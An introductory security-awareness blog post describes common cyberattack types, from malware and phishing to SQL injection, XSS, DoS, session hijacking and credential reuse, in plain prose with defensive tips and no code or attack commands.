At a Glance:
If you've ever studied famous battles in history, you'll know that no two are exactly alike. Still, there are similar strategies and tactics often used in battle because they are time-proven to be effective.Similarly, when a criminal is trying to hack an organization, they won't re-invent the wheel unless they absolutely have to: They'll draw upon a common arsenal of attacks that are known to be highly effective. Whether you're trying to make sense of the latest data breach headline in the news or analyzing an incident in your own organization, it helps to understand the different ways an attacker might try to cause harm. Here’s an overview of some of the most common types of attacks seen today.
Malware
If you've ever seen an antivirus alert pop up on your
screen, or if you've mistakenly clicked a malicious email attachment,
then you've had a close call with malware. Attackers love to use malware
to gain a foothold in users' computers—and, consequently, the offices
they work in—because it can be so effective.
“Malware” refers to various forms of harmful software, such as viruses and ransomware.
Once malware is in your computer, it can wreak all sorts of havoc, from
taking control of your machine, to monitoring your actions and
keystrokes, to silently sending all sorts of confidential data from your
computer or network to the attacker's home base.
Attackers will use a variety of methods to get malware
into your computer, but at some stage it often requires the user to take
an action to install the malware. This can include clicking a link to
download a file, or opening an attachment that may look harmless (like a
Word document or PDF attachment), but actually has a malware installer
hidden within.
Phishing
Of course, chances are you wouldn't just open a random
attachment or click on a link in any email that comes your way—there has
to be a compelling reason for you to take action. Attackers know this,
too. When an attacker wants you to install malware or divulge sensitive
information, they often turn to phishing tactics, or pretending to be
someone or something else to get you to take an action you normally
wouldn’t. Since they rely on human curiosity and impulses, phishing
attacks can be difficult to stop.
In a phishing attack, an attacker may send you an email
that appears to be from someone you trust, like your boss or a company
you do business with. The email will seem legitimate, and it will have
some urgency to it (e.g. fraudulent activity has been detected on your
account). In the email, there will be an attachment to open or a link to
click. Upon opening the malicious attachment, you’ll thereby install
malware in your computer. If you click the link, it may send you to a
legitimate-looking website that asks for you to log in to access an
important file—except the website is actually a trap used to capture
your credentials when you try to log in.
In order to combat phishing attempts, understanding the
importance of verifying email senders and attachments/links is
essential.
SQL Injection Attack
SQL (pronounced “sequel”) stands for structured query
language; it’s a programming language used to communicate with
databases. Many of the servers that store critical data for websites and
services use SQL to manage the data in their databases. A SQL injection
attack specifically targets this kind of server, using malicious code
to get the server to divulge information it normally wouldn’t. This is
especially problematic if the server stores private customer information
from the website, such as credit card numbers, usernames and passwords
(credentials), or other personally identifiable information, which are
tempting and lucrative targets for an attacker.
An SQL injection attack works by exploiting any one of
the known SQL vulnerabilities that allow the SQL server to run malicious
code. For example, if a SQL server is vulnerable to an injection
attack, it may be possible for an attacker to go to a website's search
box and type in code that would force the site's SQL server to dump all
of its stored usernames and passwords for the site.
Cross-Site Scripting (XSS)
In an SQL injection attack, an attacker goes after a
vulnerable website to target its stored data, such as user credentials
or sensitive financial data. But if the attacker would rather directly
target a website's users, they may opt for a cross-site scripting
attack. Similar to an SQL injection attack, this attack also involves
injecting malicious code into a website, but in this case the website
itself is not being attacked. Instead, the malicious code the attacker
has injected only runs in the user's browser when they visit the
attacked website, and it goes after the visitor directly, not the
website.
One of the most common ways an attacker can deploy a
cross-site scripting attack is by injecting malicious code into a
comment or a script that could automatically run. For example, they
could embed a link to a malicious JavaScript in a comment on a blog.
Cross-site scripting attacks can significantly damage a
website’s reputation by placing the users' information at risk without
any indication that anything malicious even occurred. Any sensitive
information a user sends to the site—such as their credentials, credit
card information, or other private data—can be hijacked via cross-site
scripting without the website owners realizing there was even a problem
in the first place.
Denial of Service (DoS)
Imagine you're sitting in traffic on a one-lane country
road, with cars backed up as far as the eye can see. Normally this road
never sees more than a car or two, but a county fair and a major
sporting event have ended around the same time, and this road is the
only way for visitors to leave town. The road can't handle the massive
amount of traffic, and as a result it gets so backed up that pretty much
no one can leave.
That's essentially what happens to a website during a denial of service
(DoS) attack. If you flood a website with more traffic than it was
built to handle, you'll overload the website's server and it'll be
nigh-impossible for the website to serve up its content to visitors who
are trying to access it.
This can happen for innocuous reasons of course, say if a
massive news story breaks and a newspaper's website gets overloaded
with traffic from people trying to find out more. But often, this kind
of traffic overload is malicious, as an attacker floods a website with an overwhelming amount of traffic to essentially shut it down for all users.
In some instances, these DoS attacks are performed by
many computers at the same time. This scenario of attack is known as a
Distributed Denial of Service Attack (DDoS). This type of attack can be
even more difficult to overcome due to the attacker appearing from many
different IP addresses around the world simultaneously, making
determining the source of the attack even more difficult for network
administrators.
Session Hijacking and Man-in-the-Middle Attacks
When you're on the internet, your computer has a lot of
small back-and-forth transactions with servers around the world letting
them know who you are and requesting specific websites or services. In
return, if everything goes as it should, the web servers should respond
to your request by giving you the information you're accessing. This
process, or session, happens whether you are simply browsing or when you
are logging into a website with your username and password.
The session between your computer and the remote web
server is given a unique session ID, which should stay private between
the two parties; however, an attacker can hijack the session by
capturing the session ID and posing as the computer making a request,
allowing them to log in as an unsuspecting user and gain access to
unauthorized information on the web server. There are a number of
methods an attacker can use to steal the session ID, such as a
cross-site scripting attack used to hijack session IDs.
An attacker can also opt to hijack the session to insert
themselves between the requesting computer and the remote server,
pretending to be the other party in the session. This allows them to
intercept information in both directions and is commonly called a
man-in-the-middle attack.
Credential Reuse
Users today have so many logins and passwords to
remember that it’s tempting to reuse credentials here or there to make
life a little easier. Even though security best practices universally
recommend that you have unique passwords for all your applications and
websites, many people still reuse their passwords—a fact attackers rely
on.
Once attackers have a collection of usernames and
passwords from a breached website or service (easily acquired on any
number of black market websites on the internet), they know that if they
use these same credentials on other websites there’s a chance they’ll
be able to log in. No matter how tempting it may be to reuse credentials
for your email, bank account, and your favorite sports forum, it’s
possible that one day the forum will get hacked, giving an attacker easy
access to your email and bank account. When it comes to credentials,
variety is essential. Password managers are available and can be helpful
when it comes to managing the various credentials you use.
This is just a selection of common attack types and techniques. It is
not intended to be exhaustive, and attackers do evolve and develop new
methods as needed; however, being aware of, and mitigating these types
of attacks will significantly improve your security posture
Comments
Post a Comment